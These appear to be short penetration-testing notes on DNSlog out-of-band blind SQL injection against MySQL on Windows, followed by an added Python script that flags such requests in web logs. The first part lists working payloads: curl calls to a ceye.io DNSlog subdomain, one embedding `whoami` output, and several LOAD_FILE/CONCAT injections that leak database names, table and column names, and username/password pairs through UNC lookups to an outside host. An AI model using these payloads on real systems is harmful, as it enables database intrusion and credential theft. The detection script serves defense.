The target machine must be running Windows.
DnsLog blind injection
How DnsLog blind injection works
DnsLog platform: http://ceye.io/
http://ceye.io/profile
curl mzq83x.ceye.io
curl `whoami`.mzq83x.ceye.io
DnsLog blind injection method
Core syntax: SELECT LOAD_FILE(CONCAT('\\\\',(select database()),'.mysql.r5ourp.ceye.io\\abc'));
The SQL statement must not contain special characters.
Querying tables
?id=1' and LOAD_FILE(CONCAT('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+
?id=1' and LOAD_FILE(CONCAT('\\\\',(select column_name from information_schema.columns where table_name='users' limit 5,1),'.mysql.r5ourp.ceye.io\\abc'))--+
?id=1' and LOAD_FILE(CONCAT('\\\\',(select concat(username,password) from security.users limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+
?id=1' and LOAD_FILE(CONCAT('\\\\',(select concat_ws('A',username,password) from security.users limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+
?id=1' and LOAD_FILE(CONCAT('\\\\',(select hex(concat_ws('~',username,password)) from security.users limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+
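
A detection sketch for the request shape listed above, added here as an example and not part of the original notes: it URL-decodes logged request lines and flags LOAD_FILE calls whose argument starts with a UNC prefix, separating those that embed a subquery. The log lines, the /item.php and /search.php paths, the example.test domain and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# LOAD_FILE( ... with a quoted string that starts with a UNC prefix (two or more
# backslashes) inside the call: the shape shared by every payload listed above.
UNC_LOAD_FILE = re.compile(r"load_file\s*\(.{0,400}?['\"]\\{2,}", re.I | re.S)
SUBQUERY = re.compile(r"\(\s*select\b", re.I)


def normalise(raw, max_rounds=3):
    """URL-decode repeatedly so double-encoded requests are matched as well."""
    text = raw
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify(request_line):
    """Return 'oob-exfil', 'unc-load-file' or 'clean' for one logged request."""
    text = normalise(request_line)
    match = UNC_LOAD_FILE.search(text)
    if match is None:
        return "clean"
    # A subquery after LOAD_FILE( means query output is spliced into the hostname.
    return "oob-exfil" if SUBQUERY.search(text, match.start()) else "unc-load-file"


def scan(lines):
    """Return (line_number, verdict) for every request that is not clean."""
    hits = [(n, classify(line)) for n, line in enumerate(lines, 1)]
    return [(n, verdict) for n, verdict in hits if verdict != "clean"]


# Constructed request lines; the paths and example.test are placeholders.
SAMPLE_LOG = [
    "GET /item.php?id=1 HTTP/1.1",
    "GET /item.php?id=1%27%20and%20LOAD_FILE(CONCAT(%27%5C%5C%5C%5C%27,(select%20database()),%27.x.example.test%5C%5Cabc%27))--+ HTTP/1.1",
    "GET /item.php?id=1%2527%2520and%2520load_file(concat(%2527%255C%255C%255C%255C%2527,(select%2520database()),%2527.x.example.test%255C%255Cabc%2527)) HTTP/1.1",
    "GET /item.php?id=1%27%20and%20LOAD_FILE(%27%5C%5C%5C%5Cfiles.example.test%5C%5Cabc%27)--+ HTTP/1.1",
    "GET /search.php?q=mysql+load_file+documentation HTTP/1.1",
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(number, verdict)
```

On the database side, LOAD_FILE() requires the FILE privilege and is restricted by the secure_file_priv setting, so an application account without FILE cannot issue these lookups.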